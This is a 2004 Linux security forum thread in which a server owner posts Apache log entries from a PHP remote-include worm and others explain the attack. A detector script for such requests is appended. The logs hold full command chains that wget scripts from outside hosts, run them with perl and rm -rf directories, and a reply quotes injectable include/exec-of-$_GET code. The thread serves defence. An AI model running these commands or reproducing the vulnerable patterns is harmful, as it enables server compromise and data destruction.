LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Old 12-27-2004, 02:19 AM   #1
NuLLiFiEd
LQ Newbie
 
Registered: Oct 2003
Posts: 19

Help required with a security issue?


Last night it began... my Apache access_log is flooded with this:


Code:
205.214.86.11 - - [26/Dec/2004:22:43:00 +0200] "GET /index.php?action=hxxp://envidiosos.org/~pillar/.zk/php.gif?&cmd=cd%20/tmp;rm%20-rf%20*;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;

64.62.178.130 - - [27/Dec/2004:00:06:06 +0200] "GET /index.php?action=hxxp://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/tmp/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/spool/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/usr/local/apache/proxy/;cd%20/var/tmp/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/spool/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f08

etc etc etc


What in the world is this? I tried Googling this but found nothing relevant... Please help.
 
Old 12-27-2004, 03:08 AM   #2
btmiller
Senior Member
 
Registered: May 2004
Location: In the DC 'burbs
Distribution: Arch, Scientific Linux, Debian, Ubuntu
Posts: 4,289

Looks like one of the PHP exploits going around (possibly the one that uses phpBB). It exploits a PHP remote code execution vulnerability to download and run a Perl script that looks for other sites to exploit (note the wget call in the URL). If you're running any unpatched version of PHP other than the latest (v4 or v5), you'd best update now.

Edited to say: see the stickied "PHP worm" thread in this forum, if you haven't already.

Last edited by btmiller; 12-27-2004 at 03:10 AM.
 
Old 12-27-2004, 03:11 AM   #3
NuLLiFiEd
LQ Newbie
 
Registered: Oct 2003
Posts: 19

Original Poster
I am running PHP 4.3.10 and as far as I know there's no phpBB hosted. Does this only affect phpBB or any PHP script?

Still, I get my Apache logs flooded... and growing with every hour like nothing else.

Thank you for your quick reply.


P.S. I read the sticky, but didn't find anything alike (I mean the logs)... or I didn't look "deep" enough.

Last edited by NuLLiFiEd; 12-27-2004 at 03:13 AM.
 
Old 12-27-2004, 03:17 AM   #4
btmiller
Senior Member
 
Registered: May 2004
Location: In the DC 'burbs
Distribution: Arch, Scientific Linux, Debian, Ubuntu
Posts: 4,289

If you're running PHP 4.3.10, you're probably OK (unless there's some unknown vulnerability). You can't stop yourself from getting hit by the exploit attempts, but they won't work.
 
Old 12-27-2004, 10:20 AM   #5
TruckStuff
Member
 
Registered: Apr 2002
Posts: 498

Quote:
Originally posted by btmiller
If you're running PHP 4.3.10, you're probably OK (unless there's some unknown vulnerability). You can't stop yourself from getting hit by the exploit attempts, but they won't work.
I wouldn't count on that. AFAIK, these attacks are exploiting remarkably shitty code, not PHP itself. This code does things like
Code:
include($_GET['some_unsanitized_get_var']);
and
Code:
exec($_GET['some_other_unsanitized_get_var']);
Bottom line: like any other programming language, learn WTF you are doing before you just start coding.
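A small access-log detector for the pattern this thread is about (a query parameter carrying a remote URL, plus a wget/perl command chain in a `cmd` parameter, which is what an unsanitized `include()` or `exec()` of `$_GET` input lets through), added here as an example that is not from the thread or any of its posters. The log lines, hosts and file names in it are constructed placeholders, and it only reads the log; it does not touch the vulnerable script.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache common/combined log prefix: client, ident, user, [time], "METHOD target ..."
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)')

# A parameter value that is itself a URL (the thread's requests show it defanged as hxxp://).
REMOTE_URL = re.compile(r'^(?:h[xt]{2}ps?|ftp)://', re.IGNORECASE)
# A value that starts, or continues after ; & | `, with a download/exec/cleanup command.
SHELL_CHAIN = re.compile(r'(?:^|[;&|`])\s*(?:wget|curl|perl|sh|bash|rm|cd)\b', re.IGNORECASE)

# Constructed sample lines modelled on the thread's entries (hosts and names are placeholders).
SAMPLE_LOG = """\
203.0.113.7 - - [26/Dec/2004:22:43:00 +0200] "GET /index.php?action=hxxp://attacker.example/~x/.zk/php.gif?&cmd=cd%20/tmp;wget%20attacker.example/~x/.zk/sess_PLACEHOLDER;perl%20sess_PLACEHOLDER HTTP/1.1" 200 1234
198.51.100.9 - - [27/Dec/2004:00:06:06 +0200] "GET /index.php?action=list&page=2 HTTP/1.1" 200 5678
192.0.2.4 - - [27/Dec/2004:00:07:10 +0200] "GET /index.php?action=http://evil.example/shell.txt? HTTP/1.1" 404 210
"""


def classify_request(target):
    """Return the reasons a request target looks like remote-include / command injection."""
    reasons = []
    query = urlsplit(target).query
    # Split on '&' by hand: older parse_qsl() also splits on ';', which would
    # break the injected command chain into separate parameters.
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        value = unquote(value)
        if REMOTE_URL.match(value):
            reasons.append(f"{name}: remote URL in parameter value")
        if SHELL_CHAIN.search(value):
            reasons.append(f"{name}: shell command chain")
    return reasons


def scan_log(text):
    """Return (ip, time, target, reasons) for every suspicious request in an access log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        reasons = classify_request(m['target'])
        if reasons:
            hits.append((m['ip'], m['time'], m['target'], reasons))
    return hits


if __name__ == "__main__":
    for ip, when, target, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} [{when}] {target[:60]}... -> {'; '.join(reasons)}")
```

Run it against a real access_log (`scan_log(open(path).read())`) to list which client addresses are sending these requests and which parameter carries the payload; a hit says the attempt was made, not that it succeeded.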